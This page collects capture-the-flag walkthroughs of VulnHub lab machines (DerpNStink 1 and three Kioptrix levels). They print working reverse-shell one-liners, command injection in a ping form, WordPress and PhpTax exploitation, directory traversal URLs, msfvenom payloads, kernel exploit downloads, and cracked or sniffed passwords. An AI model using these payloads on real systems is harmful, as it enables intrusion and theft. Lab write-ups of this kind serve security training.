DerpNStink: 1 walkthrough

Walkthrough of DerpNstink: 1

Enumeration:

root@kali:~# nmap -sT -A -sV –version-intensity 6 -p- 192.168.31.149

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open http Apache ht
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-title: DeRPnStiNK

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nothing from the FTP server:

root@kali:~# nmap –script=*ftp* –script-args=unsafe=1 -p 20,21 192.168.31.149

Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-06 06:35 EST
Nmap scan report for 192.168.31.149
Host is up (0.00031s latency).

PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 11315 guesses in 600 seconds, average tps: 18.7

Using metasploit we search for SSH users:

[+] 192.168.31.149:22 – SSH – User ‘gopher’ found
[+] 192.168.31.149:22 – SSH – User ‘kernoops’ found
[+] 192.168.31.149:22 – SSH – User ‘libuuid’ found
[+] 192.168.31.149:22 – SSH – User ‘list’ found
[+] 192.168.31.149:22 – SSH – User ‘listen’ found
[+] 192.168.31.149:22 – SSH – User ‘lp’ found
[+] 192.168.31.149:22 – SSH – User ‘man’ found
[+] 192.168.31.149:22 – SSH – User ‘mountfsys’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody4’ found
[+] 192.168.31.149:22 – SSH – User ‘nuucp’ found
[+] 192.168.31.149:22 – SSH – User ‘sync’ found
[+] 192.168.31.149:22 – SSH – User ‘web’ found
[+] 192.168.31.149:22 – SSH – User ‘webmaster’ found
[+] 192.168.31.149:22 – SSH – User ‘zabbix’ found

Using searchsplotit we find an OpenSSH vulnerability that might help identify SSH users:

python ./40136.py 192.168.31.149 -U /usr/share/wordlists/metasploit/unix_users.txt -e –trials 5 –bytes 10

User name enumeration against SSH daemons affected by CVE-2016-6210
Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari

[*] Testing SSHD at: 192.168.31.149:22, Banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
[*] Getting baseline timing for authenticating non-existing users…………
[*] Baseline mean for host 192.168.31.149 is 0.0631635 seconds.
[*] Baseline variation for host 192.168.31.149 is 0.0109688798904 seconds.
[*] Defining timing of x < 0.0960701396712 as non-existing user.
[*] Testing your users…
[+] rfindd – timing: 0.110398
[+] root – timing: 0.1100708

[+] 192.168.31.149:22 – SSH – User ‘gopher’ found
[[+] 192.168.31.149:22 – SSH – User ‘kernoops’ found
[+] 192.168.31.149:22 – SSH – User ‘libuuid’ found
[+] 192.168.31.149:22 – SSH – User ‘list’ found
[+] 192.168.31.149:22 – SSH – User ‘listen’ found
[+] 192.168.31.149:22 – SSH – User ‘lp’ found
[+] 192.168.31.149:22 – SSH – User ‘man’ found
[+] 192.168.31.149:22 – SSH – User ‘mountfsys’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody4’ found
[+] 192.168.31.149:22 – SSH – User ‘nuucp’ found
[+] 192.168.31.149:22 – SSH – User ‘sync’ found
[+] 192.168.31.149:22 – SSH – User ‘web’ found
[+] 192.168.31.149:22 – SSH – User ‘webmaster’ found
[+] 192.168.31.149:22 – SSH – User ‘zabbix’ found

dirb finds us some interesting results:

—- Entering directory: http://192.168.31.149/php/ —-
==> DIRECTORY: http://192.168.31.149/php/phpmyadmin/
—- Entering directory: http://192.168.31.149/temporary/ —-
—- Entering directory: http://192.168.31.149/weblog/ —-
==> DIRECTORY: http://192.168.31.149/weblog/wp-admin/

I can’t seem to find the phpmyadmin version, but I do find out the PHP version, which is PHP/5.5.9-1ubuntu4.22. This might actually help at some point.

Using a longer wordlist we find http://192.168.31.149/webnotes, which offers some clues:

We try to login via SSH, but we get trolled:

Aanother dirb result catches our attention.

http://192.168.31.149/weblog/

This redirects to http://derpnstink.local/weblog/ which we cannot view, because of DNS resolution fail. So we add the following to our /etc/hosts file:

root@kali:~/Desktop/AUTOMATED_actions# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

# stuff
192.168.31.149 derpnstink.local
192.168.31.149 www.derpnstink.local
root@kali:~/Desktop/AUTOMATED_actions#

Now we can access the page and it’s an obvious WordPress, so we fire wpscan to bruteforce some users:

wpscan –url http://derpnstink.local/weblog/ –wordlist /usr/share/wordlists/dirb/big.txt –threads 2

Brute Forcing ‘admin’ Time: 00:00:43 <========== > (1815 / 20470) 8.86% ETA: 00:07:28
+—-+————-+———————————+———-+
| Id | Login | Name | Password |
+—-+————-+———————————+———-+
| 1 | unclestinky | 404 Not | |
| 2 | admin | admin – DeRPnStiNK Professional | admin |
+—-+————-+———————————+———-+

[+] Finished: Tue Mar 6 09:05:20 2018
[+] Requests Done: 22656

wpscan also finds some vulnerabilities:

We download and run https://www.exploit-db.com/exploits/34681/

I copy a PHP reverse shell and run a netcat listener

cp /usr/share/webshells/php/php-reverse-shell.php ./

nc -lvvp 777

I edit the shell with my IP and port and run the 34681.py exploit.

python ./34681.py -t http://derpnstink.local/weblog/ -f ./php-reverse-shell.php -u admin -p admin

We have a limited shell:

Beautify the shell:

1 echo $SHELL
2 export TERM=xterm-256color
3 export SHELL=BASH
4 stty rows 55 columns 205
5 reset

We find some users in /etc/passwd

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

In /var/www/html/weblog we find the SQL user and pass:

** The name of the database for WordPress */
define(‘DB_NAME’, ‘wordpress’);

/** MySQL database username */
define(‘DB_USER’, ‘root’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘mysql’);

Login to Mysql server:

mysql -uroot -pmysql

mysql> SELECT * FROM wp_users;
SELECT * FROM wp_users;
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | flag2 |
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
| 1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky | unclestinky@DeRPnStiNK.local | | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 | 0 | unclestinky | |
| 2 | admin | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin | admin@derpnstink.local | | 2017-11-13 04:29:35 | | 0 | admin | |
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
2 rows in set (0.00 sec)

mysql>

Using hashcat I recover the following passwords for wordpress:

9b776afb479b31e8047026f1185e952dd1e530cb:wedgie57

 

We found the 1st flag by logging in wordpress with unclestinky

http://derpnstink.local/weblog/?p=8&preview=true

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

Clue in /support:

www-data@DeRPnStiNK:/support$ cat troubleshooting.txt
cat troubleshooting.txt
*******************************************************************
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.

However i dont want to specify each command to allow

How can I exclude these commands from password protection to sudo?

********************************************************************

********************************************************************
Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.

Please contact the Client Support team at https://pastebin.com/RzK9WfGw if you have any further questions or issues.

Thank you for using our product.

********************************************************************

The pastebin page says:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

It seems that we need to privesc to user mrderp to execute commands as sudo.

We go to /home

www-data@DeRPnStiNK:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Nov 12 12:54 .
drwxr-xr-x 23 root root 4.0K Nov 12 13:39 ..
drwx—— 10 mrderp mrderp 4.0K Jan 9 12:15 mrderp
drwx—— 12 stinky stinky 4.0K Jan 9 12:14 stinky

Password reuse ?

su stinky
Password: wedgie57

Works!!

We cannot seem to sudo with stinky

stinky@DeRPnStiNK:/home$ sudo su -l
sudo su -l
[sudo] password for stinky: wedgie57

stinky is not in the sudoers file. This incident will be reported.
stinky@DeRPnStiNK:/home$

Found several ssh private keys, none helped.

 

Hint:

stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are…
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~/ftp/files/network-logs$ ls -a
ls -a
. .. derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ pwd
pwd
/home/stinky/ftp/files/network-logs
stinky@DeRPnStiNK:~/ftp/files/network-logs$

Can’t use that because of permissions for tcpump, but we do find a pcap file in /home/stinky/Documents

We read it and search for papss in the txt file:

stinky@DeRPnStiNK:~/Documents$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
<ts$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
reading from file ./derpissues.pcap, link-type LINUX_SLL (Linux cooked)
stinky@DeRPnStiNK:~/Documents$ grep -i pass ./derpissues.txt
grep -i pass ./derpissues.txt
0x0400: 3034 3032 6166 3626 5f77 705f 6874 7470 0402af6&_wp_http
0x0410: 5f72 6566 6572 6572 3d25 3246 7765 626c _referer=%2Fwebl
0x0420: 6f67 2532 4677 702d 6164 6d69 6e25 3246 og%2Fwp-admin%2F
0x0430: 7573 6572 2d6e 6577 2e70 6870 2675 7365 user-new.php&use
0x0440: 725f 6c6f 6769 6e3d 6d72 6465 7270 2665 r_login=mrderp&e
0x0450: 6d61 696c 3d6d 7264 6572 7025 3430 6465 mail=mrderp%40de
0x0460: 7270 6e73 7469 6e6b 2e6c 6f63 616c 2666 rpnstink.local&f
0x0470: 6972 7374 5f6e 616d 653d 6d72 266c 6173 irst_name=mr&las
0x0480: 745f 6e61 6d65 3d64 6572 7026 7572 6c3d t_name=derp&url=
0x0490: 2532 4668 6f6d 6525 3246 6d72 6465 7270 %2Fhome%2Fmrderp
0x04a0: 2670 6173 7331 3d64 6572 7064 6572 7064 &pass1=derpderpd
0x04b0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04c0: 6572 7026 7061 7373 312d 7465 7874 3d64 erp&pass1-text=d
0x04d0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04e0: 6572 7064 6572 7064 6572 7026 7061 7373 erpderpderp&pass
0x04f0: 323d 6465 7270 6465 7270 6465 7270 6465 2=derpderpderpde
0x0500: 7270 6465 7270 6465 7270 6465 7270 2670 rpderpderpderp&p
0x0510: 775f 7765 616b 3d6f 6e26 726f 6c65 3d61 w_weak=on&role=a
0x0520: 646d 696e 6973 7472 6174 6f72 2663 7265 dministrator&cre
0x0530: 6174 6575 7365 723d 4164 642b 4e65 772b ateuser=Add+New+
0x0540: 5573 6572 User

We got the password:

stinky@DeRPnStiNK:~/Documents$ su mrderp
su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home/stinky/Documents$ id
id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)
mrderp@DeRPnStiNK:/home/stinky/Documents$

 

Flag 3 found:

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$

 

mrderp@DeRPnStiNK:~/Downloads$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~/Downloads$

We create derpy.sh and add an nc reverse shell command, start the listener on localmachine:

mrderp@DeRPnStiNK:~/binaries$ echo ‘#!/bin/bash’ >> derpy.sh
echo ‘#!/bin/bash’ >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ echo ‘bash -i >& /dev/tcp/192.168.31.139/888 0>&1′ >> derpy.sh
>> derpy.shi >& /dev/tcp/192.168.31.139/888 0>&1’
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
cat derpy.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.31.139/888 0>&1
mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
sudo ./derpy.sh
[sudo] password for mrderp: derpderpderpderpderpderpderp

Got root ?

The flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt
cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

root@DeRPnStiNK:/root/Desktop#

Kioptrix 5 walkthrough

root@kali:~# netdiscover -r 192.168.31.0/24

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————–
192.168.31.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.31.2 00:50:56:e1:a9:71 1 60 VMware, Inc.
192.168.31.146 00:50:56:20:56:e2 1 60 VMware, Inc.
192.168.31.254 00:50:56:f8:bd:9c 1 60 VMware, Inc.

Scanning:

nmap -sT -sV -A -p- 192.168.31.146 -n –open

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-26 09:05 EST
Nmap scan report for 192.168.31.146
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:20:56:E2 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (93%),
Aggressive OS guesses: FreeBSD 9.0-RELEASE – 10.3-RELEASE (93%), AVtech Room Alert 26W environmental monitor (91%), Linux 2.6.18 – 2.6.22 (90%), FreeBSD 7.0-RELEASE – 9.0-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

PHP version & Apache are not useful because I am too lazy to try all or found exploits.

mod_ssl/2.2.21 related exploits also do not seem to work because there is no HTTPS on the server and the found exploits (Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuck.c’ Remote Exploit) will not work because they need SSL.

dirb also finds nothing.

I browse to http://192.168.31.146:80 and I view source. Bingo!

<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>

searchsploit to the rescue:

 

 

# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:”pChart 2.x – examples” intext:”2.1.3″
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[1] Directory Traversal:
“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

We try different directory traversal customized URL, but they don’t work because I treat the host like a Linux system…and it is a FreeBSD one, so file locations are different.

/etc/passwd does not exist. Instead we have:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/master.passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root:

I fail to see that the root user actually has the password encrypted and I move along, searching for the equivalent of /etc/shadow, which is /etc/spwd.db, which does not load into the browser when I access:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/spwd.db%22

Google searching finds me:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

Which means that if switch the HTTP user agent to Mozilla4, I might get a different webpage.

root@kali:~# curl -H “User-Agent:Mozilla/4.0” http://192.168.31.146:8080/phptax/ | head -n1

<title>PHPTAX by William L. Berggren 2003(c)</title> 100 4125 0 4125 0 0 2014k 0 –:–:– –:–:– –:–:– 2014k curl: (23) Failed writing body (4067 != 4230) root@kali:~#

root@kali:~# searchsploit phptax
---------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
---------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection (Met | php/webapps/21833.rb
use exploit/multi/http/phptax_exec
set RHOST 192.168.31.146
set RPORT 8080

msf exploit(multi/http/phptax_exec) > run

[*] Started reverse TCP double handler on 192.168.31.139:4444
[*] 192.168.31.1468080 – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo bPVG3SBi0VbyjPza;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo RHWVYqnt2WyVvZsH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “bPVG3SBi0VbyjPza\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “RHWVYqnt2WyVvZsH\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 5 opened (192.168.31.139:4444 -> 192.168.31.146:47858) at 2018-02-26 17:22:01 -0500
[*] Command shell session 6 opened (192.168.31.139:4444 -> 192.168.31.146:56244) at 2018-02-26 17:22:01 -0500

id
uid=80(www) gid=80(www) groups=80(www)

We have limited shell.

uname -a reminds us that we are running FreeBSD 9.

We copy the exploit:

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c ./

Upload it to the victim machine with nc:

nc -lvvp 8888 < ./28718.c   // sending from the attacking machine

nc -nv 8888 > ./28718.c  // receiving on the victim machine

chmod 777 ./28718.c

We compile and run the exploit:

Congratz to myself. I still feel like a noob.

 

Kioptrix: Level 1.1 (#2) walkthrough

This is a walkthrough of the Kioptrix: Level 1.1 (#2) vulnhub machine. Original link here: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

The scan:

root@kali:~# nmap -sT -A -O -p- 192.168.31.143

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-24 07:35 EST
Nmap scan report for 192.168.31.143
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 625/udp status
|_ 100024 1 628/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2018-02-24T10:26:27+00:00; -2h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
628/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:47:D4:2E (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 – 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Network Distance: 1 hop
root@kali:~#

First I tried exploiting port 631, which is the Linux printing service, CUPS, version 1.1

Searching for the exploit:

root@kali:~/junk/kioptrix1.2# searchsploit cups 1.1
——————————————— ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
——————————————— ———————————-
CUPS 1.1.x – ‘.HPGL’ File Processor Buffer O | linux/remote/24977.txt
CUPS 1.1.x – Cupsd Request Method Denial of | linux/dos/22619.txt
CUPS 1.1.x – Negative Length HTTP Header | linux/remote/22106.txt
CUPS 1.1.x – UDP Packet Remote Denial of Ser | linux/dos/24599.txt
CUPS Server 1.1 – GET Request Denial of Serv | linux/dos/1196.c
——————————————— ———————————-
root@kali:~/junk/kioptrix1.2#

Generating the shell:

The exploit needs an .so payload, so I try it.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.139 LPORT=8443 -f elf-so >> shell.so
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf-so file: 369 bytes

For some reason, the exploit fails. Moving along.

Port 80 is open. we have an authentication form. Trying to bypass the authentication via SQL injection and it works:

Authentication is bypassed.

We are presented with a ping form, that should allow us to ping a network node.

We try command execution on it, while we setup a netcat listener on port 777 of our attacking machine.

127.0.0.1;bash -i >& /dev/tcp/192.168.31.139/777 0>&1

It works:

To privesc this we try the unix-privesc-script but no success.

Eventually I got it with a kernel exploit.

curl -k https://www.exploit-db.com/download/9542.c -o 9542.c

Compile it:

bash-3.00$ gcc -o 0x82-CVE-2009-2698 ./9542.c
./9542.c:109:28: warning: no newline at end of file

Run it:

Kioptrix level1.1 walkthrough

This is the Kioptrix vulnerable machine walkthrough.

You can download it from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

The scan:

root@kali:~# nmap -sT -sV -p- 192.168.31.142

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-17 17:00 EST
Nmap scan report for 192.168.31.142
Host is up (0.00014s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E2:87:5A (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.92 seconds
root@kali:~#

We will search for vulnerabilities for mod_ssl/2.8.4.

 

root@kali:~/junk# searchsploit 764.c
————————————————————————————————————————————————————————– ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
————————————————————————————————————————————————————————– ———————————-
Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuckV2.c’ Remote Exploit | unix/remote/764.c
Microsoft Windows – VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138) | windows/local/40764.cs
Symantec AntiVirus – IOCTL Kernel Privilege Escalation (2) | windows/local/28764.c
TechSmith Snagit 10 (Build 788) – ‘dwmapi.dll’ DLL Hijacking | windows/local/14764.c
————————————————————————————————————————————————————————– ———————————-
root@kali:~/junk#

We will try the first result.

Downloading the exploit in C format:

http://wget https://www.exploit-db.com/download/764.c

Install prerequisites

apt-get install libssl-dev libssl1.0-dev

Edit the C file.

nano 764.c

Include the following 2 lines on the SSL include area

#include <openssl/rc4.h>
#include <openssl/md5.h>

Search for wget (ctrl+W in nano) and replace the URL with this new one :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Compile the exploit:

sudo gcc -o OpenFucka ./764.c -lcrypto

Run the exploit:

root@kali:~/junk# ./OpenFucka 0x6b 192.168.31.142 443 -c 50

If everything works ok you should get your root shell: